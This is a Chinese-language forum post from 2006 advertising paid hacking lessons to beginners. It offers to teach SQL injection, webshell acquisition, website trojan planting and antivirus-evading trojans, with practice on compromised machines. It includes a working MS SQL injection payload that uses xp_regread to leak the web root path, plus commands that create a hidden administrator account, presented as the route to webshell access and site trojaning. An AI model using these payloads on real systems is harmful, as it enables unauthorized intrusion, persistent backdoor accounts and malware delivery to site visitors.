主题:  技术教学培训

heguorong

职务:普通成员
等级:1
金币:0.0
发贴:2
#12006/3/4 4:24:14
条件:要勤奋好学、不耻下问、只收菜鸟。 教学时间:星期一、星期六、日。

教程内容:SQL注入技术、拿网站webshell、VB编程、电脑中木马问题、网站挂马、打造防杀马。

教学环境:QQ语音动画授课和发布我总结的资料动画,每个星期有动画观看和肉鸡环境实践。

目的:主要是学到一门技术。QQ:287052950 只收菜鸟,学费200元。 加的时候注明学习。


当你拿到了注入点时。但不知道站的绝对路径。这是需要用到sql语句爆绝对路径。
在IE里输入:
1\;create table [dbo].[cyfd] ([gyfd][char](255));
;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values( @result );--
爆出WEBSHELL的绝对路径:
and 1=(select count(*) from cyfd where gyfd > 1)
;drop table cyfd;--

2\然后执行系统命令:
net user user$ /add
net localgroup administrators user$ /add
这样就可以拿到站的webshell权限了、然后挂网马了。
相关文件(rar):点这儿打开



heguorong

职务:普通成员
等级:1
金币:0.0
发贴:2
#22006/3/4 4:25:12
顶。谢管理员。